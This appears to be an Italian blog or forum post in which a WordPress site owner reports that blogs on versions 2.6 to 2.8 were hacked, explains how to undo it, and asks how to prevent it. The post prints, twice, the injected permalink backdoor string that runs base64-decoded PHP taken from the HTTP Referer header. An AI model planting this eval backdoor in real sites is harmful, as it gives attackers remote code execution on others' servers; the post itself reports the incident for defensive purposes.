Da ieri è in corso un attacco a diversi blog che utilizzano Wordpress.
Io avevo un sito con una vecchia versione 2.6 e altri con 2.7 e sono stati attaccati indistintamente. Anche uno con la versione 2.8 è stato modificato.
In pratica, sfruttando non so quale bug, mi sono ritrovato i siti visibili ma non era più possibile accedere ai post perché era stata modificata la struttura dei link e aggiunta questa parte di codice EVAL:
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Per far tornare tutto alla normalità, basta andare in impostazione dei permalink e togliere manualmente questo codice. Qualcuno sa come proteggersi da questo tipo di attacco?
Attacco ai siti Wordpress: è capitato anche a voi oggi?
In pratica, sfruttando non so quale bug, mi sono ritrovato i siti visibili ma non era più possibile accedere ai post perché era stata modificata la struttura dei link e aggiunta questa parte di codice EVAL: %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Per far tornare tutto alla normalità, basta andare in impostazione dei permalink e togliere manualmente questo codice. Qualcuno sa come proteggersi da questo tipo di attacco?